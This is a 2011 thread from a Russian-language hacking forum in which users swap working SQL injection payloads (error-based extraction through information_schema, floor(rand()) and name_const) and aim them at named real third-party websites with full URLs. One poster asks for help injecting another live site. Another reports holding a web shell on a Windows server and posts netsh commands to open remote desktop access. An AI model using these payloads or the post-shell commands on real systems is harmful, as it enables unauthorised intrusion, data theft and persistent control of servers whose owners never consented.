HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #18111  
Старый 15.09.2011, 21:23
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Пролез в бд но выдает все на непонятной кодировке..что можно сделать?
 
Ответить с цитированием

  #18112  
Старый 15.09.2011, 21:49
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию

Цитата:
Сообщение от xa-xa89  
А где-то подсмотреть результаты инсерта можно?
то почему бы просто не сделать вот так?
insert into TABLE (id, subid, date, data) values ('666', ''+(select bla_bla_bla), '', '')
ну и селект не из это же таблицы, помним)
способ великолепен, спасибо, но к сожалению колонка subid INT, поэтому записать левак туда не удастся.

P.S.

попробовал

1' or(1,2)=(select count(*),concat((select concat(table_name,0x3a,column_name) from information_schema.columns where table_schema !=0x696e666f726d6174696f6e5f736368656d61 limit 0,1),0x3a,floor(rand()*2)) from information_schema.columns group by 2 limit 0,1)+'

уже лучше.

MYSQL ERROR:

Operand should contain 1 column(s)

Можно же вывести через duplicate column ?

P.P.S

все решилось

1'+and+(select*from(select+count(*)from(select+1+u nion+select+2+union+select+3)x+group+by+concat(mid ((select+TABLE_NAME+from+INFORMATION_SCHEMA.TABLES +limit+0,1),1,64),floor(rand(0)*2)))z)+and+'1

спасибо FlaktW
 
Ответить с цитированием

  #18113  
Старый 16.09.2011, 00:40
xa-xa89
Участник форума
Регистрация: 17.05.2008
Сообщений: 102
С нами: 9466141

Репутация: 74
По умолчанию

@попугай

если мы речь ведем про мускуль имеет место вот такое:

insert into TABLE (id, subid, date, data) values ('666', 'SQL', '1', '1')

insert into TABLE (id, subid, date, data) values ('666', 'SQL',(select concat_ws(0x3a,version(),user()), '2'),('3','3','1','1')

это так сказать в защиту моей теории
 
Ответить с цитированием

  #18114  
Старый 16.09.2011, 01:16
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию

Цитата:
Сообщение от xa-xa89  
@попугай
если мы речь ведем про мускуль имеет место вот такое:
insert into TABLE (id, subid, date, data) values ('666', 'SQL', '1', '1')
insert into TABLE (id, subid, date, data) values ('666', '
SQL',(select concat_ws(0x3a,version(),user()), '2'),('3','3
','1','1')
это так сказать в защиту моей теории
values ( скобкой не закрыта
 
Ответить с цитированием

  #18115  
Старый 16.09.2011, 21:29
sourcec0de
Новичок
Регистрация: 13.06.2011
Сообщений: 27
С нами: 7850486

Репутация: 7
По умолчанию

Цитата:
Сообщение от Kuteke  
Помогите со скульей:
Код HTML:
http://www.gasniergicquel.com/customer/home.php?cat=2
Код HTML:
http://www.gasniergicquel.com/customer/help.php?section=presentation
Код:
http://www.gasniergicquel.com/customer/home.php?cat=2'and(select*from(select(name_const((select(concat_ws(0x3a,version(),user()))),1)),name_const((select(concat_ws(0x3a,version(),user()))),1))a)and'
 
Ответить с цитированием

  #18116  
Старый 17.09.2011, 06:10
Kuteke
Участник форума
Регистрация: 26.06.2010
Сообщений: 179
С нами: 8357366

Репутация: 6
По умолчанию

sourcec0de, спасибо! Помоги и этим:

Код HTML:
http://www.proximeety.gr/member-321531[sql].html
P.S. Сообщение не цитируйте, пожалуйста!

P.P.S. Модеры, не удаляйте это сообщение!
 
Ответить с цитированием

  #18117  
Старый 17.09.2011, 10:54
GroM88
Познающий
Регистрация: 25.10.2007
Сообщений: 46
С нами: 9761387

Репутация: 2
По умолчанию

Помогите скуль крутануть. Бред, не получается нихера = \

_http://cs.hz.by/bans/ban_details_ex.php?bhid=16683
 
Ответить с цитированием

  #18118  
Старый 17.09.2011, 11:36
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами: 9846041

Репутация: 1177


По умолчанию

Цитата:
Сообщение от GroM88  
Помогите скуль крутануть. Бред, не получается нихера = \
_http://cs.hz.by/bans/ban_details_ex.php?bhid=16683
Там нету скули. Пропускаются только цифровые значения.

Цитата:
Сообщение от Kuteke  
http://www.proximeety.gr/member-321531[sql].html
P.S. Сообщение не цитируйте, пожалуйста!
P.P.S. Модеры, не удаляйте это сообщение!
Специально буду цитировать твои сообщения, потому что ты поступаешь не по феншую.
 
Ответить с цитированием

  #18119  
Старый 17.09.2011, 20:09
Ulitko
Новичок
Регистрация: 12.08.2011
Сообщений: 18
С нами: 7764086

Репутация: 0
По умолчанию

Получил шелл на сайте. ОС системы, где стоит сайт - Windows. Как получить графический доступ? Пытался сувать батник, и запустить его, служба удаленного управления не запускается(

вот код запуска, мб я что-то напутал?

Код:
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
 
Ответить с цитированием

  #18120  
Старый 17.09.2011, 20:40
xa-xa89
Участник форума
Регистрация: 17.05.2008
Сообщений: 102
С нами: 9466141

Репутация: 74
По умолчанию

а по моему это все делается через net start
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.